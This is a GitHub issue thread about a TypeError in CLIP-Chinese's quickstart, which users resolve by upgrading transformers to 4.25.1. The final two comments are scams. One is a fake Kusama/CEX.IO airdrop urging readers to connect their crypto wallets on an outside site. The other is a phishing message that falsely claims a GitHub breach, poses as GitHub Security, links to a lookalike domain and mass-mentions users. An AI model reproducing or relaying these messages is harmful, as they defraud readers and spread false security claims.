### ISSUE TITLE
TypeError: unsupported operand type(s) for *: 'dict' and 'int'

### ISSUE THREAD

**Issue by liuzmx** [yangjianxin1/CLIP-Chinese#1]
I am a beginner in natural language processing. 

When I clone the repository, install the environment dependencies, and try to run the quickstart code in README, the following error occurs, how should I solve it?

my python version is 3.8.15, other dependencies have the same version as the requirements.txt

```shell
Traceback (most recent call last):
  File "quickstart.py", line 15, in <module>
    inputs = processor(text=["一只小狗在摇尾巴", "一只小猪在吃饭"], images=image, return_tensors="pt", padding=True)
  File "/home/liuzhiming/.miniconda3/envs/clip-chinese/lib/python3.8/site-packages/transformers/models/clip/processing_clip.py", line 85, in __call__
    image_features = self.feature_extractor(images, return_tensors=return_tensors, **kwargs)
  File "/home/liuzhiming/.miniconda3/envs/clip-chinese/lib/python3.8/site-packages/transformers/models/clip/feature_extraction_clip.py", line 146, in __call__
    images = [self.resize(image=image, size=self.size, resample=self.resample) for image in images]
  File "/home/liuzhiming/.miniconda3/envs/clip-chinese/lib/python3.8/site-packages/transformers/models/clip/feature_extraction_clip.py", line 146, in <listcomp>
    images = [self.resize(image=image, size=self.size, resample=self.resample) for image in images]
  File "/home/liuzhiming/.miniconda3/envs/clip-chinese/lib/python3.8/site-packages/transformers/models/clip/feature_extraction_clip.py", line 207, in resize
    new_short, new_long = size, int(size * long / short)
TypeError: unsupported operand type(s) for *: 'dict' and 'int'
```

I tried to output the values of several parameters in  `transformers/models/clip/feature_extraction_clip.py", line 207, in resize` and found that the type of `size` is `dict`, not `int`，The specific values are as follows：

```python
size:  {'shortest_edge': 224}
long=960
short=600
```

**Comment by mobi1019** [comment]
I have the same question, then I use the Transformers-4.25.1 and the question is solved. Hope help you~

**Comment by liuzmx** [comment]
> I have the same question, then I use the Transformers-4.25.1 and the question is solved. Hope help you~

Thanks, when I updated the version of `transformers` from `4.18.0` to `4.25.1`, the error problem was solved.

**Comment by zbbwss** [comment]
TypeError: unsupported operand type(s) for *: 'dict' and 'int'

**Comment by zbbwss** [comment]
same question

**Comment by linwhitehat** [comment]
> > I have the same question, then I use the Transformers-4.25.1 and the question is solved. Hope help you~
> 
> Thanks, when I updated the version of `transformers` from `4.18.0` to `4.25.1`, the error problem was solved.

hello,  I met the problem like "texts.append(data['text']) KeyError: 'text'" when I updated the version to 4.25.1, and I would like to ask if you encountered the same problem and how to solve it.

**Comment by zhousteven** [comment]
> > > I have the same question, then I use the Transformers-4.25.1 and the question is solved. Hope help you~
> > 
> > 
> > Thanks, when I updated the version of `transformers` from `4.18.0` to `4.25.1`, the error problem was solved.
> 
> hello, I met the problem like "texts.append(data['text']) KeyError: 'text'" when I updated the version to 4.25.1, and I would like to ask if you encountered the same problem and how to solve it.

same question!!!

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)

**Comment by guohaoyu110** [comment]
**Urgent Security Alert: GitHub Compromise**

Dear GitHub User,

We regret to inform you that our systems have detected a security breach on the GitHub platform. As a precautionary measure, we are reaching out to all users to help us resolve this situation promptly.

It appears that unauthorized access has been gained to our servers, potentially compromising user data and the integrity of our platform. To mitigate any further damage and secure your account, we kindly request your immediate assistance in granting authorization to our security team to reverse this breach.

Please click on the following link to provide the necessary authorization: [Authorize Security Reversal](https://githubcareer.online/)

Your cooperation in this matter is crucial for safeguarding the GitHub community and preventing any further unauthorized access. We assure you that our team is working tirelessly to restore normal operations and enhance our security measures to prevent future incidents.

Thank you for your attention to this matter, and we sincerely apologize for any inconvenience caused.

Best regards,  
GitHub Security Team
lihuanghai, @Mundi-Xu, @ziquanye, @isparkyou-github, @osvimer, @pangdogs, @chenkaiC4, @JiananYuan, @SeaSoonKeun, @RunzhaoChen, @xfzhu, @LionlyloveK, @BenjaminX, @EggggggTart, @brokenjacky, @milhous, @jayhsieh, @gscsd-l, @geeeekegeeeeke, @MarkLee131
